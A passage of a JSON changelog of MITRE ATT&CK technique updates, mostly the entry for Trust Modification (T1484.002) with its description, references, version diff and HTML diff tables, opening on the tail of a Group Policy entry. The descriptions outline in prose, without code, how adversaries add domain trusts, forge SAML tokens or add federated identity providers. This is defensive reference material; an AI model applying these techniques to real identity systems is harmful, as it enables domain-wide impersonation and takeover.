nowrap=\"nowrap\">nPrivilege,&nbsp;set&nbsp;in&nbsp;&lt;code&gt;&amp;lt;GPO_PATH&amp;gt;\\MACHINE\\Microsoft\\</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">oft\\Windows&nbsp;NT\\SecEdit\\GptTmpl.inf&lt;/code&gt;,&nbsp;to&nbsp;achieve&nbsp;a&nbsp;subt</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">Windows&nbsp;NT\\SecEdit\\GptTmpl.inf&lt;/code&gt;,&nbsp;to&nbsp;achieve&nbsp;a&nbsp;subtle&nbsp;A</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">le&nbsp;AD&nbsp;backdoor&nbsp;with&nbsp;complete&nbsp;control&nbsp;of&nbsp;the&nbsp;domain&nbsp;because&nbsp;t</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">D&nbsp;backdoor&nbsp;with&nbsp;complete&nbsp;control&nbsp;of&nbsp;the&nbsp;domain&nbsp;because&nbsp;the&nbsp;u</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">he&nbsp;user&nbsp;account&nbsp;under&nbsp;the&nbsp;adversary's&nbsp;control&nbsp;would&nbsp;then&nbsp;be&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ser&nbsp;account&nbsp;under&nbsp;the&nbsp;adversary's&nbsp;control&nbsp;would&nbsp;then&nbsp;be&nbsp;able</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">able&nbsp;to&nbsp;modify&nbsp;GPOs.(Citation:&nbsp;Harmj0y&nbsp;SeEnableDelegationPri</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;to&nbsp;modify&nbsp;GPOs.(Citation:&nbsp;Harmj0y&nbsp;SeEnableDelegationPrivile</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">vilege&nbsp;Right)</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ge&nbsp;Right)</td></tr>\n        </tbody>\n    </table>",
                    "changelog_mitigations": {
                        "shared": [
                            "M1018: User Account Management",
                            "M1047: Audit"
                        ],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_datacomponent_detections": {
                        "shared": [],
                        "new": [],
                        "dropped": []
                    },
                    "changelog_detectionstrategy_detections": {
                        "shared": [
                            "DET0305: Detection of Group Policy Modifications via AD Object Changes and File Activity"
                        ],
                        "new": [],
                        "dropped": []
                    }
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--24769ab5-14bd-4f4e-a752-cfb185da53ee",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2020-12-28 21:59:02.181000+00:00",
                    "modified": "2026-04-16 20:07:52.987000+00:00",
                    "name": "Trust Modification",
                    "description": "Adversaries may add new domain trusts, modify the properties of existing domain trusts, or otherwise change the configuration of trust relationships between domains and tenants to evade defenses and/or elevate privileges.Trust details, such as whether or not user identities are federated, allow authentication and authorization properties to apply between domains or tenants for the purpose of accessing shared resources.(Citation: Microsoft - Azure AD Federation) These trust objects may include accounts, credentials, and other authentication material applied to servers, tokens, and domains.\n\nManipulating these trusts may allow an adversary to escalate privileges and/or evade defenses by modifying settings to add objects which they control. For example, in Microsoft Active Directory (AD) environments, this may be used to forge [SAML Tokens](https://attack.mitre.org/techniques/T1606/002) without the need to compromise the signing certificate to forge new credentials. Instead, an adversary can manipulate domain trusts to add their own signing certificate. An adversary may also convert an AD domain to a federated domain using Active Directory Federation Services (AD FS), which may enable malicious trust modifications such as altering the claim issuance rules to log in any valid set of credentials as a specified user.(Citation: AADInternals zure AD Federated Domain) \n\nAn adversary may also add a new federated identity provider to an identity tenant such as Okta or AWS IAM Identity Center, which may enable the adversary to authenticate as any user of the tenant.(Citation: Okta Cross-Tenant Impersonation 2023) This may enable the threat actor to gain broad access into a variety of cloud-based services that leverage the identity tenant. For example, in AWS environments, an adversary that creates a new identity provider for an AWS Organization will be able to federate into all of the AWS Organization member accounts without creating identities for each of the member accounts.(Citation: AWS re Inforce Trust Mod)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "defense-impairment"
                        },
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "privilege-escalation"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1484/002",
                            "external_id": "T1484.002"
                        },
                        {
                            "source_name": "AWS re Inforce Trust Mod",
                            "description": "AWS re Inforce. (2024, June). Retrieved April 15, 2026.",
                            "url": "https://d1.awsstatic.com/onedam/marketing-channels/website/aws/en_US/events/approved/reinforce-2025/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf"
                        },
                        {
                            "source_name": "AADInternals zure AD Federated Domain",
                            "description": "Dr. Nestori Syynimaa. (2017, November 16). Security vulnerability in Azure AD & Office 365 identity federation. Retrieved September 28, 2022.",
                            "url": "https://o365blog.com/post/federation-vulnerability/"
                        },
                        {
                            "source_name": "Microsoft - Azure AD Federation",
                            "description": "Microsoft. (2018, November 28). What is federation with Azure AD?. Retrieved December 30, 2020.",
                            "url": "https://docs.microsoft.com/en-us/azure/active-directory/hybrid/whatis-fed"
                        },
                        {
                            "source_name": "Okta Cross-Tenant Impersonation 2023",
                            "description": "Okta Defensive Cyber Operations. (2023, August 31). Cross-Tenant Impersonation: Prevention and Detection. Retrieved February 15, 2024.",
                            "url": "https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Blake Strom, Microsoft 365 Defender",
                        "Praetorian",
                        "Obsidian Security"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Identity Provider",
                        "Windows"
                    ],
                    "x_mitre_version": "3.0",
                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['x_mitre_detection']\": \"\"}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2026-04-16 20:07:52.987000+00:00\", \"old_value\": \"2025-10-24 17:48:32.244000+00:00\"}, \"root['description']\": {\"new_value\": \"Adversaries may add new domain trusts, modify the properties of existing domain trusts, or otherwise change the configuration of trust relationships between domains and tenants to evade defenses and/or elevate privileges.Trust details, such as whether or not user identities are federated, allow authentication and authorization properties to apply between domains or tenants for the purpose of accessing shared resources.(Citation: Microsoft - Azure AD Federation) These trust objects may include accounts, credentials, and other authentication material applied to servers, tokens, and domains.\\n\\nManipulating these trusts may allow an adversary to escalate privileges and/or evade defenses by modifying settings to add objects which they control. For example, in Microsoft Active Directory (AD) environments, this may be used to forge [SAML Tokens](https://attack.mitre.org/techniques/T1606/002) without the need to compromise the signing certificate to forge new credentials. Instead, an adversary can manipulate domain trusts to add their own signing certificate. An adversary may also convert an AD domain to a federated domain using Active Directory Federation Services (AD FS), which may enable malicious trust modifications such as altering the claim issuance rules to log in any valid set of credentials as a specified user.(Citation: AADInternals zure AD Federated Domain) \\n\\nAn adversary may also add a new federated identity provider to an identity tenant such as Okta or AWS IAM Identity Center, which may enable the adversary to authenticate as any user of the tenant.(Citation: Okta Cross-Tenant Impersonation 2023) This may enable the threat actor to gain broad access into a variety of cloud-based services that leverage the identity tenant. For example, in AWS environments, an adversary that creates a new identity provider for an AWS Organization will be able to federate into all of the AWS Organization member accounts without creating identities for each of the member accounts.(Citation: AWS re Inforce Trust Mod)\", \"old_value\": \"Adversaries may add new domain trusts, modify the properties of existing domain trusts, or otherwise change the configuration of trust relationships between domains and tenants to evade defenses and/or elevate privileges.Trust details, such as whether or not user identities are federated, allow authentication and authorization properties to apply between domains or tenants for the purpose of accessing shared resources.(Citation: Microsoft - Azure AD Federation) These trust objects may include accounts, credentials, and other authentication material applied to servers, tokens, and domains.\\n\\nManipulating these trusts may allow an adversary to escalate privileges and/or evade defenses by modifying settings to add objects which they control. For example, in Microsoft Active Directory (AD) environments, this may be used to forge [SAML Tokens](https://attack.mitre.org/techniques/T1606/002) without the need to compromise the signing certificate to forge new credentials. Instead, an adversary can manipulate domain trusts to add their own signing certificate. An adversary may also convert an AD domain to a federated domain using Active Directory Federation Services (AD FS), which may enable malicious trust modifications such as altering the claim issuance rules to log in any valid set of credentials as a specified user.(Citation: AADInternals zure AD Federated Domain) \\n\\nAn adversary may also add a new federated identity provider to an identity tenant such as Okta or AWS IAM Identity Center, which may enable the adversary to authenticate as any user of the tenant.(Citation: Okta Cross-Tenant Impersonation 2023) This may enable the threat actor to gain broad access into a variety of cloud-based services that leverage the identity tenant. For example, in AWS environments, an adversary that creates a new identity provider for an AWS Organization will be able to federate into all of the AWS Organization member accounts without creating identities for each of the member accounts.(Citation: AWS RE:Inforce Threat Detection 2024)\", \"diff\": \"--- \\n+++ \\n@@ -2,4 +2,4 @@\\n \\n Manipulating these trusts may allow an adversary to escalate privileges and/or evade defenses by modifying settings to add objects which they control. For example, in Microsoft Active Directory (AD) environments, this may be used to forge [SAML Tokens](https://attack.mitre.org/techniques/T1606/002) without the need to compromise the signing certificate to forge new credentials. Instead, an adversary can manipulate domain trusts to add their own signing certificate. An adversary may also convert an AD domain to a federated domain using Active Directory Federation Services (AD FS), which may enable malicious trust modifications such as altering the claim issuance rules to log in any valid set of credentials as a specified user.(Citation: AADInternals zure AD Federated Domain) \\n \\n-An adversary may also add a new federated identity provider to an identity tenant such as Okta or AWS IAM Identity Center, which may enable the adversary to authenticate as any user of the tenant.(Citation: Okta Cross-Tenant Impersonation 2023) This may enable the threat actor to gain broad access into a variety of cloud-based services that leverage the identity tenant. For example, in AWS environments, an adversary that creates a new identity provider for an AWS Organization will be able to federate into all of the AWS Organization member accounts without creating identities for each of the member accounts.(Citation: AWS RE:Inforce Threat Detection 2024)\\n+An adversary may also add a new federated identity provider to an identity tenant such as Okta or AWS IAM Identity Center, which may enable the adversary to authenticate as any user of the tenant.(Citation: Okta Cross-Tenant Impersonation 2023) This may enable the threat actor to gain broad access into a variety of cloud-based services that leverage the identity tenant. For example, in AWS environments, an adversary that creates a new identity provider for an AWS Organization will be able to federate into all of the AWS Organization member accounts without creating identities for each of the member accounts.(Citation: AWS re Inforce Trust Mod)\"}, \"root['kill_chain_phases'][0]['phase_name']\": {\"new_value\": \"defense-impairment\", \"old_value\": \"defense-evasion\"}, \"root['external_references'][1]['source_name']\": {\"new_value\": \"AWS re Inforce Trust Mod\", \"old_value\": \"AWS RE:Inforce Threat Detection 2024\"}, \"root['external_references'][1]['description']\": {\"new_value\": \"AWS re Inforce. (2024, June). Retrieved April 15, 2026.\", \"old_value\": \"Ben Fletcher and Steve de Vera. (2024, June). New tactics and techniques for proactive threat detection. Retrieved September 25, 2024.\"}, \"root['external_references'][1]['url']\": {\"new_value\": \"https://d1.awsstatic.com/onedam/marketing-channels/website/aws/en_US/events/approved/reinforce-2025/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf\", \"old_value\": \"https://reinforce.awsevents.com/content/dam/reinforce/2024/slides/TDR432_New-tactics-and-techniques-for-proactive-threat-detection.pdf\"}, \"root['x_mitre_attack_spec_version']\": {\"new_value\": \"3.3.0\", \"old_value\": \"3.2.0\"}, \"root['x_mitre_version']\": {\"new_value\": \"3.0\", \"old_value\": \"2.2\"}}, \"iterable_item_removed\": {\"root['external_references'][2]\": {\"source_name\": \"CISA SolarWinds Cloud Detection\", \"description\": \"CISA. (2021, January 8). Detecting Post-Compromise Threat Activity in Microsoft Cloud Environments. Retrieved January 8, 2021.\", \"url\": \"https://us-cert.cisa.gov/ncas/alerts/aa21-008a\"}, \"root['external_references'][5]\": {\"source_name\": \"Microsoft - Azure Sentinel ADFSDomainTrustMods\", \"description\": \"Microsoft. (2020, December). Azure Sentinel Detections. Retrieved December 30, 2020.\", \"url\": \"https://github.com/Azure/Azure-Sentinel/blob/master/Detections/AuditLogs/ADFSDomainTrustMods.yaml\"}, \"root['external_references'][6]\": {\"source_name\": \"Microsoft - Update or Repair Federated domain\", \"description\": \"Microsoft. (2020, September 14). Update or repair the settings of a federated domain in Office 365, Azure, or Intune. Retrieved December 30, 2020.\", \"url\": \"https://docs.microsoft.com/en-us/office365/troubleshoot/active-directory/update-federated-domain-office-365\"}, \"root['external_references'][8]\": {\"source_name\": \"Sygnia Golden SAML\", \"description\": \"Sygnia. (2020, December). Detection and Hunting of Golden SAML Attack. Retrieved November 17, 2024.\", \"url\": \"https://www.sygnia.co/threat-reports-and-advisories/golden-saml-attack/\"}}}",
                    "previous_version": "2.2",
                    "version_change": "2.2 \u2192 3.0",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to20__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to20__0\"><a href=\"#difflib_chg_to20__top\">t</a></td><td class=\"diff_header\" id=\"from20_1\">1</td><td nowrap=\"nowrap\">Adversaries&nbsp;may&nbsp;add&nbsp;new&nbsp;domain&nbsp;trusts,&nbsp;modify&nbsp;the&nbsp;properties</td><td class=\"diff_next\"><a href=\"#difflib_chg_to20__top\">t</a></td><td class=\"diff_header\" id=\"to20_1\">1</td><td nowrap=\"nowrap\">Adversaries&nbsp;may&nbsp;add&nbsp;new&nbsp;domain&nbsp;trusts,&nbsp;modify&nbsp;the&nbsp;properties</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;of&nbsp;existing&nbsp;domain&nbsp;trusts,&nbsp;or&nbsp;otherwise&nbsp;change&nbsp;the&nbsp;configur</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;of&nbsp;existing&nbsp;domain&nbsp;trusts,&nbsp;or&nbsp;otherwise&nbsp;change&nbsp;the&nbsp;configur</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ation&nbsp;of&nbsp;trust&nbsp;relationships&nbsp;between&nbsp;domains&nbsp;and&nbsp;tenants&nbsp;to&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ation&nbsp;of&nbsp;trust&nbsp;relationships&nbsp;between&nbsp;domains&nbsp;and&nbsp;tenants&nbsp;to&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">evade&nbsp;defenses&nbsp;and/or&nbsp;elevate&nbsp;privileges.Trust&nbsp;details,&nbsp;such</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">evade&nbsp;defenses&nbsp;and/or&nbsp;elevate&nbsp;privileges.Trust&nbsp;details,&nbsp;such</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;as&nbsp;whether&nbsp;or&nbsp;not&nbsp;user&nbsp;identities&nbsp;are&nbsp;federated,&nbsp;allow&nbsp;auth</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;as&nbsp;whether&nbsp;or&nbsp;not&nbsp;user&nbsp;identities&nbsp;are&nbsp;federated,&nbsp;allow&nbsp;auth</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">entication&nbsp;and&nbsp;authorization&nbsp;properties&nbsp;to&nbsp;apply&nbsp;between&nbsp;dom</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">entication&nbsp;and&nbsp;authorization&nbsp;properties&nbsp;to&nbsp;apply&nbsp;between&nbsp;dom</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ains&nbsp;or&nbsp;tenants&nbsp;for&nbsp;the&nbsp;purpose&nbsp;of&nbsp;accessing&nbsp;shared&nbsp;resource</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ains&nbsp;or&nbsp;tenants&nbsp;for&nbsp;the&nbsp;purpose&nbsp;of&nbsp;accessing&nbsp;shared&nbsp;resource</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">s.(Citation:&nbsp;Microsoft&nbsp;-&nbsp;Azure&nbsp;AD&nbsp;Federation)&nbsp;These&nbsp;trust&nbsp;ob</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">s.(Citation:&nbsp;Microsoft&nbsp;-&nbsp;Azure&nbsp;AD&nbsp;Federation)&nbsp;These&nbsp;trust&nbsp;ob</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">jects&nbsp;may&nbsp;include&nbsp;accounts,&nbsp;credentials,&nbsp;and&nbsp;other&nbsp;authentic</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">jects&nbsp;may&nbsp;include&nbsp;accounts,&nbsp;credentials,&nbsp;and&nbsp;other&nbsp;authentic</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ation&nbsp;material&nbsp;applied&nbsp;to&nbsp;servers,&nbsp;tokens,&nbsp;and&nbsp;domains.&nbsp;&nbsp;Man</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ation&nbsp;material&nbsp;applied&nbsp;to&nbsp;servers,&nbsp;tokens,&nbsp;and&nbsp;domains.&nbsp;&nbsp;Man</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ipulating&nbsp;these&nbsp;trusts&nbsp;may&nbsp;allow&nbsp;an&nbsp;adversary&nbsp;to&nbsp;escalate&nbsp;pr</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ipulating&nbsp;these&nbsp;trusts&nbsp;may&nbsp;allow&nbsp;an&nbsp;adversary&nbsp;to&nbsp;escalate&nbsp;pr</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ivileges&nbsp;and/or&nbsp;evade&nbsp;defenses&nbsp;by&nbsp;modifying&nbsp;settings&nbsp;to&nbsp;add&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ivileges&nbsp;and/or&nbsp;evade&nbsp;defenses&nbsp;by&nbsp;modifying&nbsp;settings&nbsp;to&nbsp;add&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">objects&nbsp;which&nbsp;they&nbsp;control.&nbsp;For&nbsp;example,&nbsp;in&nbsp;Microsoft&nbsp;Active</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">objects&nbsp;which&nbsp;they&nbsp;control.&nbsp;For&nbsp;example,&nbsp;in&nbsp;Microsoft&nbsp;Active</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;Directory&nbsp;(AD)&nbsp;environments,&nbsp;this&nbsp;may&nbsp;be&nbsp;used&nbsp;to&nbsp;forge&nbsp;[SAM</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;Directory&nbsp;(AD)&nbsp;environments,&nbsp;this&nbsp;may&nbsp;be&nbsp;used&nbsp;to&nbsp;forge&nbsp;[SAM</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">L&nbsp;Tokens](https://attack.mitre.org/techniques/T1606/002)&nbsp;wit</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">L&nbsp;Tokens](https://attack.mitre.org/techniques/T1606/002)&nbsp;wit</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">hout&nbsp;the&nbsp;need&nbsp;to&nbsp;compromise&nbsp;the&nbsp;signing&nbsp;certificate&nbsp;to&nbsp;forge</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">hout&nbsp;the&nbsp;need&nbsp;to&nbsp;compromise&nbsp;the&nbsp;signing&nbsp;certificate&nbsp;to&nbsp;forge</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;new&nbsp;credentials.&nbsp;Instead,&nbsp;an&nbsp;adversary&nbsp;can&nbsp;manipulate&nbsp;domai</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;new&nbsp;credentials.&nbsp;Instead,&nbsp;an&nbsp;adversary&nbsp;can&nbsp;manipulate&nbsp;domai</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">n&nbsp;trusts&nbsp;to&nbsp;add&nbsp;their&nbsp;own&nbsp;signing&nbsp;certificate.&nbsp;An&nbsp;adversary&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">n&nbsp;trusts&nbsp;to&nbsp;add&nbsp;their&nbsp;own&nbsp;signing&nbsp;certificate.&nbsp;An&nbsp;adversary&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">may&nbsp;also&nbsp;convert&nbsp;an&nbsp;AD&nbsp;domain&nbsp;to&nbsp;a&nbsp;federated&nbsp;domain&nbsp;using&nbsp;Ac</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">may&nbsp;also&nbsp;convert&nbsp;an&nbsp;AD&nbsp;domain&nbsp;to&nbsp;a&nbsp;federated&nbsp;domain&nbsp;using&nbsp;Ac</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tive&nbsp;Directory&nbsp;Federation&nbsp;Services&nbsp;(AD&nbsp;FS),&nbsp;which&nbsp;may&nbsp;enable</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tive&nbsp;Directory&nbsp;Federation&nbsp;Services&nbsp;(AD&nbsp;FS),&nbsp;which&nbsp;may&nbsp;enable</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;malicious&nbsp;trust&nbsp;modifications&nbsp;such&nbsp;as&nbsp;altering&nbsp;the&nbsp;claim&nbsp;is</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;malicious&nbsp;trust&nbsp;modifications&nbsp;such&nbsp;as&nbsp;altering&nbsp;the&nbsp;claim&nbsp;is</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">suance&nbsp;rules&nbsp;to&nbsp;log&nbsp;in&nbsp;any&nbsp;valid&nbsp;set&nbsp;of&nbsp;credentials&nbsp;as&nbsp;a&nbsp;spe</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">suance&nbsp;rules&nbsp;to&nbsp;log&nbsp;in&nbsp;any&nbsp;valid&nbsp;set&nbsp;of&nbsp;credentials&nbsp;as&nbsp;a&nbsp;spe</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">cified&nbsp;user.(Citation:&nbsp;AADInternals&nbsp;zure&nbsp;AD&nbsp;Federated&nbsp;Domain</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">cified&nbsp;user.(Citation:&nbsp;AADInternals&nbsp;zure&nbsp;AD&nbsp;Federated&nbsp;Domain</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">)&nbsp;&nbsp;&nbsp;An&nbsp;adversary&nbsp;may&nbsp;also&nbsp;add&nbsp;a&nbsp;new&nbsp;federated&nbsp;identity&nbsp;provi</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">)&nbsp;&nbsp;&nbsp;An&nbsp;adversary&nbsp;may&nbsp;also&nbsp;add&nbsp;a&nbsp;new&nbsp;federated&nbsp;identity&nbsp;provi</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">der&nbsp;to&nbsp;an&nbsp;identity&nbsp;tenant&nbsp;such&nbsp;as&nbsp;Okta&nbsp;or&nbsp;AWS&nbsp;IAM&nbsp;Identity&nbsp;C</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">der&nbsp;to&nbsp;an&nbsp;identity&nbsp;tenant&nbsp;such&nbsp;as&nbsp;Okta&nbsp;or&nbsp;AWS&nbsp;IAM&nbsp;Identity&nbsp;C</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">enter,&nbsp;which&nbsp;may&nbsp;enable&nbsp;the&nbsp;adversary&nbsp;to&nbsp;authenticate&nbsp;as&nbsp;any</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">enter,&nbsp;which&nbsp;may&nbsp;enable&nbsp;the&nbsp;adversary&nbsp;to&nbsp;authenticate&nbsp;as&nbsp;any</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;user&nbsp;of&nbsp;the&nbsp;tenant.(Citation:&nbsp;Okta&nbsp;Cross-Tenant&nbsp;Impersonati</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">&nbsp;user&nbsp;of&nbsp;the&nbsp;tenant.(Citation:&nbsp;Okta&nbsp;Cross-Tenant&nbsp;Impersonati</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">on&nbsp;2023)&nbsp;This&nbsp;may&nbsp;enable&nbsp;the&nbsp;threat&nbsp;actor&nbsp;to&nbsp;gain&nbsp;broad&nbsp;acce</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">on&nbsp;2023)&nbsp;This&nbsp;may&nbsp;enable&nbsp;the&nbsp;threat&nbsp;actor&nbsp;to&nbsp;gain&nbsp;broad&nbsp;acce</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ss&nbsp;into&nbsp;a&nbsp;variety&nbsp;of&nbsp;cloud-based&nbsp;services&nbsp;that&nbsp;leverage&nbsp;the&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ss&nbsp;into&nbsp;a&nbsp;variety&nbsp;of&nbsp;cloud-based&nbsp;services&nbsp;that&nbsp;leverage&nbsp;the&nbsp;</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">identity&nbsp;tenant.&nbsp;For&nbsp;example,&nbsp;in&nbsp;AWS&nbsp;environments,&nbsp;an&nbsp;advers</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">identity&nbsp;tenant.&nbsp;For&nbsp;example,&nbsp;in&nbsp;AWS&nbsp;environments,&nbsp;an&nbsp;advers</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ary&nbsp;that&nbsp;creates&nbsp;a&nbsp;new&nbsp;identity&nbsp;provider&nbsp;for&nbsp;an&nbsp;AWS&nbsp;Organiza</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">ary&nbsp;that&nbsp;creates&nbsp;a&nbsp;new&nbsp;identity&nbsp;provider&nbsp;for&nbsp;an&nbsp;AWS&nbsp;Organiza</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tion&nbsp;will&nbsp;be&nbsp;able&nbsp;to&nbsp;federate&nbsp;into&nbsp;all&nbsp;of&nbsp;the&nbsp;AWS&nbsp;Organizati</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\">tion&nbsp;will&nbsp;be&nbsp;able&nbsp;to&nbsp;federate&nbsp;into&nbsp;all&nbsp;of&nbsp;the&nbsp;AWS&nbsp;Organizati</td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td 